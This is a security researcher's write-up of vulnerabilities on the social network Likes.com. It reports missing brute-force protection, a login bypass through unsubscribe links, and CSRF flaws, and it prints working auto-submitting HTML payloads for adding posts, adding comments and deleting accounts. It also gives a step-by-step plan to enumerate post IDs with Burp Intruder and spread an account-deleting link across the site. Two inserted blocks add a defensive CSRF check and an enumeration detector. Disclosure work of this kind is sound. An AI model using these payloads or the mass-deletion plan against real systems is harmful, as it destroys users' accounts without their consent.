Hello, I'm Mohamed M. Fouad, an independent security researcher from Egypt. I have received acknowledgements from many firms such as Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise and many more...
================================================
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Likes.com is a social network application for connecting with people you like and making new friends for free.
Critical Vulnerability : LIKES Account Deletion CSRF
Hello Guys!
Today I will show you how I discovered a lot of critical security vulnerabilities at Likes.com. They can have a very harmful impact on all users by forcing them to add any post, add any comment and delete their accounts, and these vulnerabilities can be escalated to deface the whole site by posting malicious URLs so that all users delete their accounts.
Story:
While browsing Facebook one week ago I found some friends sharing photos, and I found that the source of these photos was LIKES.com. At first I didn't know about it, but when I googled it I found it's a famous social network website used by people like Facebook, Twitter, Google+ etc... So I started looking for security vulnerabilities and found that the whole site was vulnerable to CSRF attacks. There were other vulnerabilities like login brute force and login bypass, but the most critical one for me was CSRF because it can force users to add any post, add any comment and delete their accounts, and it can be escalated to deface the whole site by generating random POSTs (image_ids) and posting a malicious URL to DELETE USER ACCOUNTS, so you can call it SPAM to delete users' accounts.
Vulnerabilities:
1 - Login Page brute-force attack :
A brute-force attack attempts to discover a password by systematically trying every possible combination of letters, numbers and symbols until the one correct combination is found.
This login page does not have any protection against password-guessing (brute-force) attacks. It is recommended to implement some type of account lockout after a defined number of incorrect password attempts.
2 - Add Post CSRF :
Here you can force any user to add a post using CSRF.
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/add_post" method="post" name="csrf">
<input type="hidden" name="caption" value="CSRF"><br>
<input type="hidden" name="post_type" value="text"><br>
<input type="hidden" name="description" value=""><br>
<input type="hidden" name="short_description" value=""><br>
<input type="hidden" name="add_source" value="desktop_compose"><br>
<input type="hidden" name="tag_length" value="0"><br>
</form>
</body>
</html>
3 - Add Comment CSRF :
Here you can force users to add any comment to any post you choose.
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/add_comment" method="post" name="csrf">
<input type="hidden" name="image_id" value="33901352"><br>
<input type="hidden" name="gallery_id" value="false"><br>
<input type="hidden" name="comment_text" value="<any malicious link or text>"><br>
</form>
</body>
</html>
Below is the Critical one !!!!
4 - DELETE USER ACCOUNTS :
Here the "deactivate account" function is the critical one: LIKES does not deactivate the account, it deletes it. You can force users to delete their accounts with JUST ONE CLICK!!!! by hosting this payload on any domain owned by the attacker and posting the malicious URL in a lot of POSTs on LIKES.COM. JUST ONE CLICK will DELETE the USER ACCOUNT.
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/delete_user" method="post" name="csrf">
<input type="hidden" name="break_cache" value="14094286391700.11307647102512419">
</form>
</body>
</html>
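All three payloads above work because the add_post, add_comment and delete_user endpoints accept a POST from any origin with no per-session token. As an added example (not code from Likes.com or from the write-up), here is the server-side check that defeats such forged forms: reject state-changing POSTs whose Origin/Referer is foreign, and require a synchronizer token the attacker's page cannot read. The endpoint list, the site origin and the session store are assumptions for this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed for this example: the site's own origin and the three endpoints the write-up shows
# accepting cross-site POSTs. SESSIONS is a constructed stand-in for a server-side session store.
SITE_ORIGIN = "http://likes.com"
STATE_CHANGING = {"/api/add_post", "/api/add_comment", "/api/delete_user"}
SESSIONS = {}  # session id -> per-session CSRF token

def issue_csrf_token(session_id):
    """Mint a random token for the session; the site embeds it in every legitimate form."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token

def check_csrf(path, headers, form, session_id):
    """Decide whether a POST may change state. Returns (accepted, reason)."""
    if path not in STATE_CHANGING:
        return True, "not state-changing"
    # Check 1: Origin (or Referer). The auto-submitting forms above are served from the
    # attacker's domain, so the browser stamps the request with a foreign Origin.
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, f"cross-origin request from {parts.netloc}"
    # Check 2: synchronizer token. The attacker's page cannot read the victim's token,
    # so a forged form can never supply it; compare in constant time.
    expected = SESSIONS.get(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"

if __name__ == "__main__":
    # Replay the write-up's delete_user payload: forged form, no token, attacker origin.
    forged = {"break_cache": "14094286391700.11307647102512419"}
    print(check_csrf("/api/delete_user", {"Origin": "http://attacker.example"}, forged, "victim"))
    # A legitimate submission from the site's own settings page carries the token.
    tok = issue_csrf_token("victim")
    legit = {**forged, "csrf_token": tok}
    print(check_csrf("/api/delete_user", {"Origin": SITE_ORIGIN}, legit, "victim"))
```

Both checks are needed: the Origin check alone fails for clients that strip the header, and the token alone does not help if a token is ever leaked into an attacker-readable page.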
5 - Login Bypass :
I found a login bypass security problem: when you click the "unsubscribe" link in your email notifications you are redirected to account settings. Try opening this URL in any browser or on a different machine: your account will be opened normally!!!!! So what about login???? It bypassed your login.
HOW TO DEFACE ALL THE SITE :
First you have to register a new user. Host the delete-user-account payload as an HTML file on any domain, then shorten this published URL; now you're ready for the full defacement. Finally you need to share this malicious URL in the comments of all LIKES posts. To do that, open Burp Suite and intercept any comment request, then take the (image_id) parameter from the request: this is the POST ID in LIKES.COM. Now create your dictionary of (image_ids); you can generate a lot of ids online, and it's easy because the (image_id) parameter is only 8 digits. After generation you have your own dictionary. IT'S TIME FOR DEFACEMENT: load this dictionary into Intruder and enumerate all the image ids in the add_comment request with your MALICIOUS URL as the comment value. You can mark which requests succeeded by grepping the responses for the error value "Post Not Provided", so all unchecked items are the successful ones. Now your malicious URL is published in a lot of online POSTs, and if any user CLICKS it, his/her account is deleted immediately without any confirmation.
[Screenshot: Add Comment Request]
[Screenshot: Intruder image_id Enumeration Value]
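The enumeration described above leaves a distinctive trace: one session posting comments to many sequential image_ids in seconds, most of them answered with "Post Not Provided". As an added example (not part of the original write-up), this is detection logic a site operator could run over comment-API logs to flag that pattern; the log format, session ids and timestamps are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

KV = re.compile(r'(\w+)=("(?:[^"]*)"|\S+)')

def parse_line(line):
    """Turn one key=value log line into a dict; quoted values keep their spaces."""
    rec = {k: v.strip('"') for k, v in KV.findall(line)}
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec

def build_sample_log():
    """Constructed sample log (not real Likes.com data): one normal user and one session
    spraying sequential 8-digit image_ids, the pattern an Intruder run produces."""
    lines = ["sess=u1 ts=2014-08-29T10:00:01 path=/api/add_comment image_id=33901352 error=-",
             "sess=u1 ts=2014-08-29T10:03:15 path=/api/add_comment image_id=33901360 error=-"]
    for i in range(12):
        err = "-" if i % 4 == 0 else '"Post Not Provided"'  # a few guesses hit real posts
        lines.append(f"sess=x9 ts=2014-08-29T10:05:{i:02d} path=/api/add_comment "
                     f"image_id={10000000 + i} error={err}")
    return lines

def find_enumerators(lines, min_requests=10, min_error_ratio=0.5, window_seconds=60):
    """Return {session: stats} for sessions that comment on many distinct image_ids
    inside a short window with a high 'Post Not Provided' error rate."""
    by_sess = defaultdict(list)
    for rec in map(parse_line, lines):
        if rec.get("path") == "/api/add_comment":
            by_sess[rec["sess"]].append(rec)
    flagged = {}
    for sess, recs in by_sess.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # slide the window so every request in it is within window_seconds of the latest
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window = recs[start:end + 1]
            errors = sum(r["error"] == "Post Not Provided" for r in window)
            if len(window) >= min_requests and errors / len(window) >= min_error_ratio:
                flagged[sess] = {"requests": len(window), "errors": errors,
                                 "distinct_image_ids": len({r["image_id"] for r in window})}
                break  # first window that trips the threshold is enough to flag the session
    return flagged

if __name__ == "__main__":
    print(find_enumerators(build_sample_log()))
```

A flagged session is a candidate for comment throttling or a CAPTCHA; a normal user commenting on a handful of posts never reaches the threshold.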
Video demonstration URL :
Hope you find it interesting, and HAVE FUN with the POC Video :)
Regards,